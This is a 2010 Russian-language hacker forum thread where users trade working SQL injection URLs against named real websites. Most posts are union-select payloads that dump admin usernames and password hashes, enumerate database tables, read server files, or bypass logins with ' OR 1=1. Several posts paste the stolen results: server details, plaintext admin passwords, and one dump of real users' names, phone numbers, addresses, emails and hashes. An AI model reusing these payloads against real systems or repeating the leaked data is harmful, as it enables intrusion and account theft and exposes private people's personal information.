RE: Ваши Sql-инъекции
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Ваши Sql-инъекции - 2010-08-03 19:52:55.836666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.swaziboyentertainment.com/news.php?id=-4+union+all+select+1,group_concat%28id,0x3b,username,0x3b,password,0x3b%29,3,4,5+from+jos_users+limit%200,1--
|
|
|
RE: Ваши Sql-инъекции - 2010-08-03 20:13:16.556666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.juggernautmc.com/news.php?id=-4+union+all+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables+limit+0,1--
|
|
|
RE: Ваши Sql-инъекции - 2010-08-04 00:23:25.990000
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.witec.de/en/company/witecnews/news.php?id=-12+union+select+1,2,table_name,4,5,6+from+information_schema.tables+limit+0,1--
|
|
|
RE: Ваши Sql-инъекции - 2010-08-04 00:41:48.196666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.britanick.com/news.php?id=-12+union+select+1,table_name,3,4+from+information_schema.tables+limit+0,1--
USER:DBO231488865@74.208.16.102 BASEDIR:/USR/LOCAL/MYSQL-5.0.81-LINUX-I686-GLIBC23/ TMPDIR:/VAR/TMP VER:5.0.81-LOG DATADIR:/DB/MYSQL/ BASE:DB231488865 OS:PC-LINUX-GNU
|
|
|
RE: Ваши Sql-инъекции - 2010-08-05 12:23:05.460000
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.catsatappleyard.co.uk/index.php?id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10--
|
|
|
RE: Ваши Sql-инъекции - 2010-08-05 21:12:20.973333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.f-cool.com/fz/shop.php?id=-10+UNION%20SELECT%201,2,3,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94--
|
|
|
RE: Ваши Sql-инъекции - 2010-08-06 23:04:34.730000
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.mondorecords.com/shop.php
?id=-200+UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--
|
|
|
RE: Ваши Sql-инъекции - 2010-08-07 20:09:34.470000
|
|
|
nsk.itprof
Сообщений: 1
Оценки: 0
Присоединился: 2010-08-07 19:50:06.800000
|
ra-servis.ru/admin login: ' OR 1=1 # pass: 123
|
|
|
RE: Ваши Sql-инъекции - 2010-08-11 12:25:19.566666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.charmingdna.com.tw/phpshop/shop.php?id=-600+UNION SELECT 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95--
|
|
|
RE: Ваши Sql-инъекции - 2010-08-11 12:41:19.133333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.dishotay.co.uk/shop.php
?id=-90 UNION SELECT 1,2,table_name,4,5,6,7,8+from+information_schema.tables+limit+19,1
|
|
|
RE: Ваши Sql-инъекции - 2010-08-12 12:02:13.156666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.williamsburgmag.com/view_article.php?id=154+union+select+1,2,3,4,table_name,6,7+from+information_schema.tables+--+
|
|
|
RE: Ваши Sql-инъекции - 2010-08-12 12:07:04.303333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.huhmagazine.co.uk/view_article.php?id=-154+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
|
|
|
RE: Ваши Sql-инъекции - 2010-08-12 12:48:15.140000
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.sirhaciendas.com/admin rfell;rofell user:sirhacie_h4c13nd@localhost ver:5.0.91-community base:sirhacie_sirhaciendas basedir:/ datadir:/var/lib/mysql/ tmpdir:/tmp/ os:pc-linux-gnu
|
|
|
RE: Ваши Sql-инъекции - 2010-08-12 17:37:48.690000
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.cinemacity.org/view_article.php?id=-67+UNION%20SELECT%201,group_concat%28id,0x3b,username,0x3b,password%29,3,4,5,6,7,8,9,10,11+from+user--
|
|
|
RE: Ваши Sql-инъекции - 2010-08-13 16:29:49.953333
|
|
|
vkw81
Сообщений: 2
Оценки: 0
Присоединился: 2010-08-13 16:26:08.666666
|
Я не хакер, просто программист. Вот нашел большую дырку. http://mccain.senate.gov/public/index.cfm?FuseAction=PressOffice.PressReleases&ContentRecord_id=34285dab-b807-0da2-da50-eb432e8fd88'8 При любом не верном ContentRecord_id выдаёт ошибку.
|
|
|
RE: Ваши Sql-инъекции - 2010-08-13 17:00:32.003333
|
|
|
florgas
Сообщений: 377
Оценки: 0
Присоединился: 2009-10-12 14:44:27.050000
|
Извините за флуд, но у меня один вопрос: Какой смысл проводить sql inj , если один хрен все пароли в хэше? Если я что то не так говорю, то объясните мне.
|
|
|
RE: Ваши Sql-инъекции - 2010-08-13 17:47:05.920000
|
|
|
vkw81
Сообщений: 2
Оценки: 0
Присоединился: 2010-08-13 16:26:08.666666
|
Я плохо разбираюсь в этом. Может кому пригодится, ошибка выдала много информации о сервере.
|
|
|
RE: Ваши Sql-инъекции - 2010-08-14 10:21:05.983333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://dekzon.com/mail.php?id=-1%20union%20select%201,group_concat%28mem_id,0x3a,0x3a,user,0x3a,0x3a,pwd%29,3,4,5,6,7,8,9,10,11%20from%20member
|
|
|
RE: Ваши Sql-инъекции - 2010-08-14 15:04:02.006666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.europeantrophy.com/game.php?id=-1%20UNION%20SELECT%201,2,3,load_file%28%27/tmp/lol.txt%27%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 извращался немного..
|
|
|
RE: Ваши Sql-инъекции - 2010-08-14 21:06:21.153333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://freegan.org.uk/pages/view_article.php?id=-13 union select 1,2,group_concat(username,0x2d,password),4 from admin_users -- free2btrue
|
|
|
RE: Ваши Sql-инъекции - 2010-08-14 21:47:40.396666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.peterclack.com.au/view_article.php?id=-37%20union%20select%201,2,3,4,5,6,7,8%20from%20admin Мочите сами)
|
|
|
RE: Ваши Sql-инъекции - 2010-08-15 12:11:54.226666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.seasource.org/cc.php?id=-1+union+select+column_name,2,3,4%20from%20information_schema.columns%20+%20where%20+%20table_name=CHAR%2897,%20108,%20117,%20109,%20110,%20105%29%20+%20limit%207,1--
|
|
|
RE: Ваши Sql-инъекции - 2010-08-16 16:37:55.646666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://tancsuli.hu/main.php?id=10&cikk=-163+union+select+1,2,3,4,5,6,7,column_name,9,10,11,12,13%20from%20information_schema.columns+where+table_name=CHAR%2897,%20100,%20109,%20105,%20110%29+limit+4,1 for example: ID номер, телефон, адрес, дата, время, Удалить пароль, йога, Email, Имя gaborn:::0000-00-00 00:00:00:9:N:464864fb15e720cf:webpc@webpc.hu:Német Gábor koffer:06309968902::0000-00-00 00:00:00:8:N:*00A0B8AE32DBF0B8506A5D6CFDFFD22ED1324044::koffer@freemail.hu:Komáromi Ferenc smartadmin:::2008-04-01 14:44:36:6:N:19ef2fd66087fe82::info@smartsector.hu:Smartsector Kft adam:::0000-00-00 00:00:00:10:N:407b57227b962f76::bme.adams@gmail.com:Ádám Medvey agica:06703818964:Bp Liliom utca 6.:0000-00-00 00:00:00:7:N:73b7db57153c96cf::fater.agnes@mail.vpop.hu:Fatér Ágnes
|
|
|
RE: Ваши Sql-инъекции - 2010-08-17 12:21:54.030000
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.madeitup.nl/?page=shop&page_id=12&shop_id=10&do=view_item&item_id=-42+union+select+1,2,column_name,4%20from%20information_schema.columns+where+table_name=CHAR%2898,%20101,%20116,%2097,%20108,%20105,%20110,%20103,%20101,%20110%29%20limit%206,1
|
|
|
RE: Ваши Sql-инъекции - 2010-08-17 12:37:57.156666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.haerder-center.de/htdocs/shopping.php?task=view&shop_id=-10+UNION+SELECT+1,SQL,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
|
|
|
RE: Ваши Sql-инъекции - 2010-08-19 06:32:32.490000
|
|
|
fasfas
Сообщений: 152
Оценки: 0
Присоединился: 2010-06-06 14:21:15.500000
|
http://www.4wdsystems.com.au/index.php?id=-70+union+select+1,concat(user(),0x2a,database(),0x2a,version()),3,4,5,6,7,8,9,10 User: wc449836_jess@localhost Database: wc449836_db Version: 5.0.90-community-log
|
|
|
RE: Ваши Sql-инъекции - 2010-08-21 18:16:54.880000
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.floramarket.kiev.ua/price.php?id=-100+union+select+1,2,3,4,concat_ws%28version%28%29,0x2d,database%28%29,0x2d,user%28%29%29,6,7,8,9 ver: 5.1.40 database: floramark_floramark5.1.40 user: 5.1.40floramark_flora@192.168.1.12
|
|
|
RE: Ваши Sql-инъекции - 2010-08-29 20:04:31.916666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://maxgreenled.mgxhk.com/categories.php?id=100+union+select+1,SQL,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- admin:passwd
|
|
|
RE: Ваши Sql-инъекции - 2010-09-03 14:27:29.620000
|
|
|
Prelude
Сообщений: 78
Оценки: 0
Присоединился: 2010-09-01 18:20:08.880000
|
http://www.hrshop.es/index.php?command=new_products&id=250311+and+1=0+ albertalbert , albertalbert
|
|
|
RE: Ваши Sql-инъекции - 2010-09-03 14:29:20.453333
|
|
|
Prelude
Сообщений: 78
Оценки: 0
Присоединился: 2010-09-01 18:20:08.880000
|
http://www.originalpooch.co.uk/product_details.php?id=37+and+1=0+ admin , doggy123
|
|
|
RE: Ваши Sql-инъекции - 2010-10-01 18:47:22.036666
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
www.sng-moskva.ru/forum/show_mess.php?id=-536+union+select+group_concat(login,0x3a,password,0x0b),2+from+db_sngmoskva.auth– хеш админа лень было искать
|
|
|
RE: Ваши Sql-инъекции - 2010-10-06 21:04:56.623333
|
|
|
ninja96c
Сообщений: 138
Оценки: 0
Присоединился: 2010-09-30 01:50:35.943333
|
del
|
|
|
RE: Ваши Sql-инъекции - 2010-10-13 11:22:22.120000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.powdercoating.org/productList.php?id=1+union+select+1,2,34,5,67,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
|
|
|
RE: Ваши Sql-инъекции - 2010-10-14 22:41:52.176666
|
|
|
exploit3602
Сообщений: 6
Оценки: 0
Присоединился: 2010-10-14 22:39:14.350000
|
http://www.r61-rabota.ru/index.php?id=146+union+select+1,2,group_concat(version(),0x3E3E3E3E,database(),0x3E3E3E3E,user()),4–
|
|
|
RE: Ваши Sql-инъекции - 2010-10-17 10:53:03.830000
|
|
|
c1
Сообщений: 106
Оценки: 0
Присоединился: 2010-09-20 21:15:45.050000
|
http://www.law.cf.ac.uk/contactsandpeople/biography.php?sn=-1%27+or+%28select+count%28*%29+from+%28select+1+union+select+2+union+select+3%29x+group+by+concat%28version%28%29,floor%28rand%280%29*2%29%29%29+–+]http://www.law.cf.ac.uk/contactsandpeople/biography.php?sn=-1'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(version(),floor(rand(0)*2)))+–+ http://www.mpl.mpg.de/mpf/php/abteilung3/cms/_rubric/detail.php?nr=11+or+%28select+count%28*%29+from+%28select+1+union+select+2+union+select+3%29x+group+by+concat%28version%28%29,floor%28rand%280%29*2%29%29%29–&rubric=Publications]http://www.mpl.mpg.de/mpf/php/abteilung3/cms/_rubric/detail.php?nr=11+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(version(),floor(rand(0)*2)))–&rubric=Publications
|
|
|
RE: Ваши Sql-инъекции - 2010-10-18 17:34:16.693333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.shalomhills.com/eventdisplay.php?id=-999+union+select+version(),2,3--
|
|
|
RE: Ваши Sql-инъекции - 2010-10-19 17:31:43.530000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
хз куда нужно было постить это… думаю ничего страшного если будет тут…)));) http://www.bestekloza.in/gallery/DSC00180.JPG
|
|
|
RE: Ваши Sql-инъекции - 2010-10-19 20:05:29.583333
|
|
|
Паприка
Сообщений: 143
Оценки: 0
Присоединился: 2010-10-19 16:27:01.590000
|
http://www.proconsim.ru/cat.php?m=-645+and+1=2+union+all+select+1,2,3,concat_ws(0x3a, login,pass,email),5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41+from+users–
|
|
|
RE: Ваши Sql-инъекции - 2010-10-19 20:08:04.903333
|
|
|
Паприка
Сообщений: 143
Оценки: 0
Присоединился: 2010-10-19 16:27:01.590000
|
http://www.melonfire.com/community/columns/trog/article.php?id=-280 /*!union*/ select 1,2,table_name,4,5,6 from information_schema.`tables`– 1
|
|
|
RE: Ваши Sql-инъекции - 2010-10-19 20:09:22.890000
|
|
|
Паприка
Сообщений: 143
Оценки: 0
Присоединился: 2010-10-19 16:27:01.590000
|
http://www.lisenok.ru/look.php?id=-99999+union+select+1,2,3,concat_ws%280x3a,login,pa ssword,access_level%29,5+from+users– Тиц 60
|
|
|
|
|